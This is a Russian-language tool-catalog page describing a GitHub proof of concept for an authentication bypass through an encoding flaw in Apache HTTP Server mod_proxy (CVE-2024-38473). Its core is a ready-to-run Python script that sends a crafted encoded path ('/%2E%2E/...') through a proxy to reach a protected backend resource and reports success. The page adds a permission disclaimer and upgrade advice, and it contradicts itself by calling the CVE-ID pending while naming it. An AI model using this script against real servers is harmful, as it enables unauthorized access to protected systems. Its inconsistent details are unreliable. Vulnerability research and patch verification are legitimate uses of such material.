Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-38473 — Доказательство концепции, демонстрирующее ошибку кодирования в Apache HTTP Server mod_proxy, которая может обойти аутентификацию с помощью специально созданных закодированных URL. | Kitploit
Инструменты/GitHubGitHub/abdurahmon3236/cve-2024-38473
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Доказательство концепции, демонстрирующее ошибку кодирования в Apache HTTP Server mod_proxy, которая может обойти аутентификацию с помощью специально созданных закодированных URL.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3242 лет назадЕщё не проверено

Доказательство концепции (PoC) для проблемы кодирования в mod_proxy в Apache HTTP Server

Этот репозиторий содержит скрипты доказательства концепции (PoC) для демонстрации проблемы кодирования в модуле mod_proxy Apache HTTP Server версий 2.4.59 и ниже. Эта уязвимость позволяет отправлять URL-адреса запросов с некорректной кодировкой на внутренние сервисы, что потенциально может обойти аутентификацию с помощью специально созданных запросов.

Содержание

  • Описание уязвимости
  • Настройка и использование
  • Важные замечания
  • Меры по смягчению

Описание уязвимости

CVE-ID: (Ожидается)

Обзор: Проблема кодирования в модуле mod_proxy Apache HTTP Server версий 2.4.59 и ниже позволяет отправлять URL-адреса запросов с некорректной кодировкой на внутренние сервисы. Это потенциально может обойти механизмы аутентификации с помощью специально созданных запросов. Пользователям рекомендуется обновиться до версии 2.4.60, в которой эта проблема исправлена.

Затронутые версии:

  • Apache HTTP Server 2.4.59 и ниже

Исправленная версия:

  • Apache HTTP Server 2.4.60

Настройка и использование

Предварительные требования

  • Python 3.x
  • requests library (pip install requests)

Демонстрация уязвимости

  1. Определите внутренний сервис:

    • Предположим, что внутренний сервис находится по адресу http://backend-service.example.com.
  2. Создайте вредоносный запрос:

    • Вредоносный запрос будет использовать некорректную кодировку для обхода аутентификации.
  3. Запустите скрипт PoC:

    • Сохраните следующий скрипт как mod_proxy_poc.py и запустите его.

Скрипт PoC

Вот скрипт на Python, демонстрирующий уязвимость:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

Пояснение

  1. Конфигурация:

    • proxy_url: URL прокси-сервера.
    • backend_service_path: Путь к защищённому ресурсу на внутреннем сервисе.
    • malicious_path: Некорректно закодированный путь для обхода аутентификации.
  2. send_malicious_request:

    • Создаёт вредоносный URL с некорректно закодированным путём.
    • Отправляет GET-запрос на прокси-сервер с вредоносным URL.
    • Выводит детали ответа, чтобы проверить, был ли выполнен обход аутентификации.

Важные замечания

  • Разрешения: Убедитесь, что у вас есть явное разрешение на тестирование этой уязвимости в целевой системе. Несанкционированный доступ является незаконным и неэтичным.
  • Тестовая среда: Проводите этот тест в контролируемой среде, чтобы избежать воздействия на производственные системы.

Меры по смягчению

Чтобы смягчить эту уязвимость, обновитесь до Apache HTTP Server версии 2.4.60, в которой исправлена проблема кодирования в модуле mod_proxy.

  • Инструкции по обновлению:
    • Следуйте официальной документации Apache HTTP Server для загрузки и установки последней версии.

Поддерживая ваше программное обеспечение в актуальном состоянии и следуя лучшим практикам безопасности, вы можете предотвратить уязвимости, такие как эта проблема кодирования в модуле mod_proxy.

Скачать инструмент